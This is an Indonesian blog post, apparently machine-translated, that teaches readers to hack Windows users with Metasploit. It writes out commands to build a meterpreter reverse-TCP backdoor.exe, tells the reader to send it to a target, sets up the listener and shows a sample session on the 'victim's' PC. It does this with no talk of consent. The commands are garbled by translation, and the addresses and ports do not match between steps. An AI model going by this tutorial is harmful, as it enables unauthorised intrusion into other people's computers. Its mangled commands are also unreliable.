Hacking Pengguna windows dengan Metasploit
Hi, selamat datang 
Apakah Anda pernah ingin hack komputer lain dalam hidup Anda? Jika ya, baik saya berada di sini untuk membantu Anda. Dalam panduan ini kita akan hack pengguna Windows dengan menggunakan kerangka kerja Metasploit. Sebelum kita lanjutkan, silakan membaca dan memahami ini pertama.
Apakah Anda pernah ingin hack komputer lain dalam hidup Anda? Jika ya, baik saya berada di sini untuk membantu Anda. Dalam panduan ini kita akan hack pengguna Windows dengan menggunakan kerangka kerja Metasploit. Sebelum kita lanjutkan, silakan membaca dan memahami ini pertama.
Metasploit
Sebuah proyek keamanan komputer yang menyediakan informasi tentang kerentanan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan IDS tanda tangan.
Mengeksploitasi
Mengeksploitasi adalah sarana yang seorang penyerang, atau pentester hal ini, mengambil keuntungan dari cacat dalam sistem, aplikasi, atau layanan. Penyerang menggunakan mengeksploitasi untuk menyerang sistem dengan cara yang menghasilkan hasil yang diinginkan tertentu yang pengembang tidak pernah dimaksudkan. Eksploitasi umum termasuk buffer overflows, kerentanan aplikasi web (seperti SQL injection), dan kesalahan konfigurasi.
Payload
Sebuah payload adalah kode yang ingin kita sistem untuk mengeksekusi dan yang akan dipilih dan disampaikan oleh Framework. Misalnya, reverse shell adalah muatan yang menciptakan koneksi dari mesin target kembali ke penyerang sebagai command prompt Windows, sedangkan shell mengikat adalah muatan yang "mengikat" command prompt ke port mendengarkan pada mesin target, yang penyerang kemudian dapat terhubung. Sebuah payload juga bisa menjadi sesuatu yang sederhana seperti beberapa perintah yang akan dijalankan pada sistem operasi target.
Meterpreter
Sebuah maju, dinamis extensible payload yang menggunakan di memori stagers injeksi DLL dan diperpanjang melalui jaringan pada saat runtime. Ini berkomunikasi selama socket aktor dan menyediakan komprehensif sisi klien Ruby API.Ini fitur sejarah perintah, tab selesai, saluran, dan banyak lagi.
Persyaratan
- Pentesting Sistem Operasi (saya sarankan Kali Linux)
- Metasploit Framework (Sudah dipasang di sebagian besar OS Keamanan)
- Pengetahuan dasar
Mempersiapkan Backdoor
- Buka Terminal dan ketik perintah ini
root @ kali: ~ jendela # msfpayload / meterpreter / reverse_tcp LHOST = 192.168.1.2 LPORT = 88 X> backdoor.exe
- Setelah proses selesai, kirim backdoor untuk target Anda.
Penjelasan
Perintah akan mengatur Payload untuk backdoor kami sebagai tcp terbalik untuk Windows. The LHOST dan LPORT adalah alamat Ip dan port Anda ingin korban terhubung ke. Ubah LHOST ke alamat IP Anda di LAN (Local Area Network) dan tidak umum / alamat IP eksternal. Anda dapat lookup IP Anda dengan mengetikkan ke ifconfigTerminal. Jika Anda ingin menargetkan orang-orang di WAN (Wide Area Network) / Internet Anda perlu port foward pertama dan kemudian Anda dapat menggunakan Umum / Alamat IP eksternal Anda. Tak ketinggalan, jumlah LPORT terserah Anda apa yang nomor Anda ingin menempatkan selama port tidak digunakan oleh layanan lain.
Bersiaplah untuk Menyerang
- Sekali lagi, buka terminal lain dan ketik perintah ini
root @ kali: ~ # layanan postgresql startroot @ kali: ~ # layanan metasploit awal
- Atau anda bisa langsung memulai layanan dengan pergi ke Aplikasi> Kali Linux> Layanan Sistem> Metasploits> Mulai
- Setelah proses inisialisasi selesai, ketik msfconsole di terminal. Ini akan membutuhkan waktu beberapa saat.
- Ketik perintah ini
msf> penggunaan mengeksploitasi / multi-/ handlermsf exploit (handler)> set PAYLOAD windows / meterpreter / reverse_tcpmsf exploit (handler)> set LHOST your_ip_heremsf exploit (handler)> set LPORT your_port_heremsf exploit (handler)> mengeksploitasi
Penjelasan
Seperti yang Anda lihat layanan PostgreSQL mulai dan layanan metasploit start untuk memulai layanan. Perintah penggunaan mengeksploitasi / multi-/ handler dan mengatur PAYLOAD windows / meterpreter / reverse_tcpberarti bahwa kita akan menggunakan handler metasploit dan sama mengeksploitasi yang kita digunakan untuk membuat backdoor kami sebelumnya. Jika Anda mengetik acara pilihan, Anda akan melihat LHOST dan LPORT tidak diatur dengan benar. Itu sebabnya kita perlu mengatur LHOST dan LPORT lagi dengan alamat IP dan port yang kita gunakan sebelumnya untuk backdoor kami. Eksploitasi? Saya harap Anda tahu apa perintah yang tidak
Menyerang
- Katakanlah kita telah mencapai target, sehingga Anda akan melihat ini keluar dari terminal Anda
[*] Dimulai handler terbalik di 162.198.37.130:86[*] Mulai handler payload ...[*] Mengirim tahap (769024 bytes) ke 162.198.37.134[*] Sesi meterpreter 1 dibuka (162.198.37.130:86 -> 162.198.37.134:49280 di 2015/07/18meterpreter>
- Setelah mengatakan sesi meterpreter dibuka, kini Anda bisa melakukan apa saja yang Anda inginkan. Misalnya melihat info sistem Korban. Cukup ketik sysinfo di terminal.
- Anda juga dapat men-download dan meng-upload file dari / ke PC Korban
- Untuk lebih perintah, ketik bantuan dan Anda akan melihat sekelompok perintah
Itu semua harap ini membantu!
Layar
Download
0 Response to "Cara Hack Windows User dengan Metasploits! "
Post a Comment